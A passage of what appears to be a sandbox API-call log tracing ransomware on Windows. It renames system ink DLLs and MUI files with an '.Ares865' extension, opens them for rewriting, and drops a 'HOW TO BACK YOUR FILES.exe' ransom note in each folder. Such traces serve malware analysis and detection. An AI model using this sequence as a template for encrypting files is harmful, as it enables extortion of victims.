shared\\ink\\penkor.dll.ares865"), dwFlags=0x1) returned 1 [0151.437] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penkor.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.437] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.440] lstrcpyW (in: lpString1=0x2cce472, lpString2="penusa.dll" | out: lpString1="penusa.dll") returned="penusa.dll" [0151.440] lstrlenW (lpString="penusa.dll") returned 10 [0151.440] lstrlenW (lpString="Ares865") returned 7 [0151.440] lstrcmpiW (lpString1="usa.dll", lpString2="Ares865") returned 1 [0151.440] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll.Ares865") returned 75 [0151.440] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penusa.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penusa.dll.ares865"), dwFlags=0x1) returned 1 [0151.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penusa.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.442] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.445] lstrcpyW (in: lpString1=0x2cce472, lpString2="pipanel.dll" | out: lpString1="pipanel.dll") returned="pipanel.dll" [0151.445] lstrlenW (lpString="pipanel.dll") returned 11 [0151.445] lstrlenW (lpString="Ares865") returned 7 [0151.445] lstrcmpiW (lpString1="nel.dll", lpString2="Ares865") returned 1 [0151.445] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll.Ares865") returned 76 [0151.445] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.dll.ares865"), dwFlags=0x1) returned 1 [0151.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=84992) returned 1 [0151.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.454] lstrcpyW (in: lpString1=0x2cce472, lpString2="pipanel.exe" | out: lpString1="pipanel.exe") returned="pipanel.exe" [0151.455] lstrlenW (lpString="pipanel.exe") returned 11 [0151.455] lstrlenW (lpString="Ares865") returned 7 [0151.455] lstrcmpiW (lpString1="nel.exe", lpString2="Ares865") returned 1 [0151.455] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe.Ares865") returned 76 [0151.455] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.exe.ares865"), dwFlags=0x1) returned 1 [0151.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.457] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6656) returned 1 [0151.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.458] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.458] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.460] lstrcpyW (in: lpString1=0x2cce472, lpString2="pipres.dll" | out: lpString1="pipres.dll") returned="pipres.dll" [0151.461] lstrlenW (lpString="pipres.dll") returned 10 [0151.461] lstrlenW (lpString="Ares865") returned 7 [0151.461] lstrcmpiW (lpString1="res.dll", lpString2="Ares865") returned 1 [0151.461] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll.Ares865") returned 75 [0151.461] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipres.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipres.dll.ares865"), dwFlags=0x1) returned 1 [0151.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipres.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.466] lstrcpyW (in: lpString1=0x2cce472, lpString2="rtscom.dll" | out: lpString1="rtscom.dll") returned="rtscom.dll" [0151.466] lstrlenW (lpString="rtscom.dll") returned 10 [0151.466] lstrlenW (lpString="Ares865") returned 7 [0151.466] lstrcmpiW (lpString1="com.dll", lpString2="Ares865") returned 1 [0151.466] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll.Ares865") returned 75 [0151.466] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\rtscom.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\rtscom.dll.ares865"), dwFlags=0x1) returned 1 [0151.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\rtscom.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.468] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=126464) returned 1 [0151.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.478] lstrcpyW (in: lpString1=0x2cce472, lpString2="skchobj.dll" | out: lpString1="skchobj.dll") returned="skchobj.dll" [0151.478] lstrlenW (lpString="skchobj.dll") returned 11 [0151.478] lstrlenW (lpString="Ares865") returned 7 [0151.478] lstrcmpiW (lpString1="obj.dll", lpString2="Ares865") returned 1 [0151.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll.Ares865") returned 76 [0151.478] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchobj.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchobj.dll.ares865"), dwFlags=0x1) returned 1 [0151.481] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchobj.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.481] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.484] lstrcpyW (in: lpString1=0x2cce472, lpString2="skchui.dll" | out: lpString1="skchui.dll") returned="skchui.dll" [0151.484] lstrlenW (lpString="skchui.dll") returned 10 [0151.484] lstrlenW (lpString="Ares865") returned 7 [0151.484] lstrcmpiW (lpString1="hui.dll", lpString2="Ares865") returned 1 [0151.484] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll.Ares865") returned 75 [0151.484] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchui.dll.ares865"), dwFlags=0x1) returned 1 [0151.486] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.487] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.490] lstrcpyW (in: lpString1=0x2cce472, lpString2="TabTip32.exe" | out: lpString1="TabTip32.exe") returned="TabTip32.exe" [0151.490] lstrlenW (lpString="TabTip32.exe") returned 12 [0151.490] lstrlenW (lpString="Ares865") returned 7 [0151.490] lstrcmpiW (lpString1="p32.exe", lpString2="Ares865") returned 1 [0151.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe.Ares865") returned 77 [0151.490] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tabtip32.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tabtip32.exe.ares865"), dwFlags=0x1) returned 1 [0151.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tabtip32.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.493] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10240) returned 1 [0151.493] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.493] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.497] lstrcpyW (in: lpString1=0x2cce472, lpString2="tiptsf.dll" | out: lpString1="tiptsf.dll") returned="tiptsf.dll" [0151.497] lstrlenW (lpString="tiptsf.dll") returned 10 [0151.497] lstrlenW (lpString="Ares865") returned 7 [0151.497] lstrcmpiW (lpString1="tsf.dll", lpString2="Ares865") returned 1 [0151.497] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll.Ares865") returned 75 [0151.497] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll.ares865"), dwFlags=0x1) returned 1 [0151.499] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.499] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=348160) returned 1 [0151.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.527] lstrcpyW (in: lpString1=0x2cce472, lpString2="tpcps.dll" | out: lpString1="tpcps.dll") returned="tpcps.dll" [0151.527] lstrlenW (lpString="tpcps.dll") returned 9 [0151.527] lstrlenW (lpString="Ares865") returned 7 [0151.527] lstrcmpiW (lpString1="cps.dll", lpString2="Ares865") returned 1 [0151.527] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll.Ares865") returned 74 [0151.527] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tpcps.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tpcps.dll.ares865"), dwFlags=0x1) returned 1 [0151.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tpcps.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.529] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40960) returned 1 [0151.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.534] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization" [0151.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0151.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0151.535] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 73 [0151.535] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization" [0151.535] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.535] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\hwrcustomization\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.535] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.536] GetLastError () returned 0x0 [0151.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.536] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.536] CloseHandle (hObject=0x120) returned 1 [0151.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.536] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.536] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5376d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5376d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.536] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.536] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.537] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US" [0151.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0151.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0151.537] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US") returned 62 [0151.537] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US" [0151.537] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.537] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.538] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.538] GetLastError () returned 0x0 [0151.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.538] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.538] CloseHandle (hObject=0x120) returned 1 [0151.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.538] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.538] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53793220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53793220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.538] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.538] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.539] lstrcpyW (in: lpString1=0x2cce47e, lpString2="InkObj.dll.mui" | out: lpString1="InkObj.dll.mui") returned="InkObj.dll.mui" [0151.539] lstrlenW (lpString="InkObj.dll.mui") returned 14 [0151.539] lstrlenW (lpString="Ares865") returned 7 [0151.539] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0151.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.Ares865") returned 85 [0151.539] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.ares865"), dwFlags=0x1) returned 1 [0151.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.545] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4608) returned 1 [0151.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0151.557] lstrcpyW (in: lpString1=0x2cce47e, lpString2="micaut.dll.mui" | out: lpString1="micaut.dll.mui") returned="micaut.dll.mui" [0151.557] lstrlenW (lpString="micaut.dll.mui") returned 14 [0151.557] lstrlenW (lpString="Ares865") returned 7 [0151.557] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0151.557] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.Ares865") returned 85 [0151.557] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.ares865"), dwFlags=0x1) returned 1 [0151.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft 